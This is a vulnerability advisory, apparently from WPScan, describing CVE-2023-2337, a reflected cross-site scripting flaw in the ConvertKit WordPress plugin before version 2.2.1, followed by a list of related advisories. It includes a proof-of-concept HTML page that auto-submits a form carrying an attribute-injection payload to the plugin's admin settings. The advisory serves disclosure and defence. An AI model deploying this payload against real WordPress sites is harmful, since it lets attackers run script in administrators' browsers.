ConvertKit < 2.2.1 – Reflected XSS | CVE 2023-2337 | Plugin Vulnerabilities

Description

The plugin does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/options-general.php?page=_wp_convertkit_settings" method="POST">
      <input type="hidden" name="page" value='"style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 2.2.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

e5a6f834-80a4-406b-acae-57ffeec2e689

Timeline

Publicly Published

2023-05-15 (about 1 years ago)

Added

2023-05-15 (about 1 years ago)

Last Updated

2023-05-15 (about 1 years ago)

Other

Published

Title

Published

2022-04-19

Title

Bulk Edit and Create User Profiles < 1.5.14 - Admin+ Stored Cross-Site Scripting

Published

2014-08-01

Title

Post views 2.6.1.2 - search_input Parameter Cross-Site Scripting (XSS)

Published

2017-05-23

Title

Newsletter by Supsystic - Authenticated Stored XSS & CSRF

Published

2021-11-23

Title

Gwolle Guestbook < 4.2.0 - Reflected Cross-Site Scripting

Published

2021-11-29

Title

MOLIE <= 0.5 - Reflected Cross-Site Scripting